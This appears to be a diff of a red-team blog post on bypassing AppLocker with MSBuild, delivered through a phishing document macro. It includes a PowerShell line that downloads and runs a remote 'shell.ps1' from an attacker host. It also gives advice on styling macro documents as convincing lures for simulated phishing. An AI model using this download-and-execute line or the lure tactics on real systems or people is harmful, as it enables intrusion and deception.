egre55/egre55.github.io/_posts/2018-3-11-multi-stage-msbuild-applocker-bypass.md

 `pipeline.Commands.AddScript("IEX (iwr 'http://10.10.10.10/shell.ps1')");`

-<script src="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3.js"></script>

 Good.
 But now we need a means of delivering the project file and executing MSBuild.
 The macro below will download the csproj file to disk.

+<script src="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3.js"></script>

 In order to stand a chance of the macro being executed, we need to dress the document appropriately.

 John Lambert (@JohnLaTwC) regularly shares interesting phishing lures and payloads, if you need inspiration for simulated phishing campaigns ;).
 I find the "Document created in newer/older Office version" lures especially convincing.
 John has put together [this](https://t.co/OwH28ltngy) compendium of macro based lures on one-drive (link below), which is great for educating users about the different lures attackers use.

-Now that our "malicious" document has been crafted we can test this out in the lab.
+Now that our "malicious" document has been created we can test this out in the lab.

 <script src="https://gist.github.com/egre55/563159175f8d6c1d31d7f3af77357549.js"></script>